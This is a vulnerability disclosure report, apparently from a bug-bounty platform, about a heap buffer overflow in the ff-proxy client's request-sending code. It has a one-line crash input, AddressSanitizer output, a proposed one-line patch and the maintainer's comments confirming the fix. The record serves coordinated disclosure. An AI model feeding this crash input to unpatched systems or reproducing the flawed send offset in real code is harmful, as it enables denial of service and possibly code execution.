Heap-based Buffer Overflow in timetoogo/ff-proxy

Valid

Reported on

Oct 10th 2021


Description

Heap based buffer overflow in ff_client_send_request. Can be triggered if the buffer size is more than FF_CLIENT_MAX_PACKET_LENGTH

Proof of Concept

z3phyr@ubuntu:~/ff-proxy$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 20.04.3 LTS
Release:  20.04
Codename:   focal

z3phyrp@ubuntu:~/ff-proxy$ python3 -c 'print("A" * 1300)' | ./build/client --port 8081
[2021-10-10 12:12:07] DEBUG Initialising OpenSSL
[2021-10-10 12:12:07] DEBUG Initialised OpenSSL
[2021-10-10 12:12:07] DEBUG Read 1301 bytes from STDIN
[2021-10-10 12:12:07] DEBUG Packetised payload into 2 packets
[2021-10-10 12:12:07] DEBUG Creating socket
[2021-10-10 12:12:07] INFO Sending request to 127.0.0.1:8081
[2021-10-10 12:12:07] INFO test: 2
[2021-10-10 12:12:07] INFO test: 2
=================================================================
==51443==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a000001794 at pc 0x7ffff7619985 bp 0x7fffffffdd40 sp 0x7fffffffd4e8
READ of size 61 at 0x61a000001794 thread T0
    #0 0x7ffff7619984  (/lib/x86_64-linux-gnu/libasan.so.5+0x98984)
    #1 0x55555555d58a in ff_client_send_request client/c/client.c:345
    #2 0x55555555abbc in ff_client_make_request client/c/client.c:56
    #3 0x55555555d925 in main client/c/main.c:21
    #4 0x7ffff704d0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #5 0x55555555892d in _start (/home/giridharp/ff-proxy/build/client+0x492d)

0x61a000001794 is located 0 bytes to the right of 1300-byte region [0x61a000001280,0x61a000001794)
allocated by thread T0 here:
    #0 0x7ffff768edc6 in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10ddc6)
    #1 0x55555555beb7 in ff_client_packetise_request client/c/client.c:200
    #2 0x55555555ab63 in ff_client_make_request client/c/client.c:54
    #3 0x55555555d925 in main client/c/main.c:21
    #4 0x7ffff704d0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)


Impact

This corrupts other packets that are to be sent and hence abusing the heap metadata can cause arbitrary code execution. Will create a POC if possible.

Occurences

Will send this potential patch if the maintainer approves :)

-            chunk_length = sendto(sockfd, packets[i].value + sent_length, packets[i].length, 0, res->ai_addr, res->ai_addrlen);
+            chunk_length = sendto(sockfd, packets[i].value, packets[i].length, 0, res->ai_addr, res->ai_addrlen);
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
z3phyr
2 months ago

Researcher


hi huntr.dev team, is there any update?

We have contacted a member of the timetoogo/ff-proxy team and are waiting to hear back a month ago
timetoogo validated this vulnerability a month ago
z3phyr has been awarded the disclosure bounty
The fix bounty is now up for grabs
timetoogo
a month ago

Maintainer


Patch doesn’t look quite right. Still need to take partial sends into account.

timetoogo
a month ago

Maintainer


Ignore last comment, partial sends are not required for UDP, will be submitting a patch soon

timetoogo confirmed that a fix has been merged on 50566a a month ago
The fix bounty has been dropped
client.c#L345 has been validated